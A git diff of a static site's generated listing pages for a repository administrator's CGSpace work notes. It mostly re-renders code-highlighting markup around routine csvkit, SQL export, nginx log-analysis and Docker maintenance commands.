index e6cccf6c9..b220663f4 100644
--- a/docs/categories/index.html
+++ b/docs/categories/index.html
@@ -10,14 +10,14 @@
-
+
-
+
diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html
index 5a861de61..d3c79ee31 100644
--- a/docs/categories/notes/index.html
+++ b/docs/categories/notes/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -94,11 +94,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -170,13 +170,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Read more → @@ -199,9 +199,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      Read more → @@ -223,15 +223,15 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Read more → @@ -288,8 +288,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
# docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
• I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
Read more →
@@ -313,9 +313,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
• Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
-
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
-COPY 20994
-
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+
                                                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → diff --git a/docs/categories/notes/index.xml b/docs/categories/notes/index.xml index f145f89c9..b6f224efe 100644 --- a/docs/categories/notes/index.xml +++ b/docs/categories/notes/index.xml @@ -17,11 +17,11 @@ <ul> <li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span 
style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> @@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & <li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> <li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p -Purging 1989 hits from The Knowledge AI in statistics -Purging 1235 hits from MaCoCu in statistics -Purging 455 hits from WhatsApp in statistics -<span style="color:#960050;background-color:#1e0010"> -</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> 
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> @@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics <li>I experimented with manually sharding the Solr statistics on DSpace Test</li> <li>First I exported all the 2019 stats from CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid -$ zstd statistics-2019.json -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> @@ -101,15 +101,15 @@ $ zstd statistics-2019.json <ul> <li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; -$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; 
/tmp/2021-10-01-affiliations.txt -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili -ations-matching.csv -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l -1879 -$ wc -l /tmp/2021-10-01-affiliations.txt -7100 /tmp/2021-10-01-affiliations.txt -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> <li>So we have 1879/7100 (26.46%) matching already</li> </ul> @@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Update Docker images on AReS server (linode20) and reboot the server:</li> </ul> -<div class="highlight"><pre tabindex="0" 
style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> <li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> </ul> @@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; -COPY 20994 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 
215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> @@ -271,17 +271,17 @@ COPY 20994 <li>I had a call with CodeObia to discuss the work on OpenRXV</li> <li>Check the results of the AReS harvesting from last night:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> -{ - &#34;count&#34; : 100875, - &#34;_shards&#34; : { - &#34;total&#34; : 1, - &#34;successful&#34; : 1, - &#34;skipped&#34; : 0, - &#34;failed&#34; : 0 - } -} -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> @@ -599,17 +599,17 @@ COPY 20994 </ul> </li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +<pre 
tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 1277694 </code></pre><ul> <li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> <li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot; +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; 106781 </code></pre> @@ -620,7 +620,7 @@ COPY 20994 Tue, 01 Oct 2019 13:20:51 +0300 https://alanorth.github.io/cgspace-notes/2019-10/ - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc. 
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. @@ -634,7 +634,7 @@ COPY 20994 <li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> <li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -645,7 +645,7 @@ COPY 20994 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -761,16 +761,16 @@ DELETE 1 </ul> </li> </ul> -<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk 
'{print $9}' | sort | uniq -c | sort -n | tail -n 5 +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 4432 200 </code></pre><ul> <li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> <li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d </code></pre> @@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week 
from 250% to 275%—I might need to increase it again!</li> <li>The top IPs before, during, and after this latest alert tonight were:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 245 207.46.13.5 332 54.70.40.11 385 5.143.231.38 @@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> <li>There were just over 3 million accesses in the nginx logs last month:</li> </ul> -<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot; +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; 3018243 real 0m19.873s @@ -844,7 +844,7 @@ sys 0m1.979s <li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> <li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 92 40.77.167.4 99 210.7.29.100 120 38.126.157.45 @@ -979,7 +979,7 @@ sys 0m1.979s <li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a 
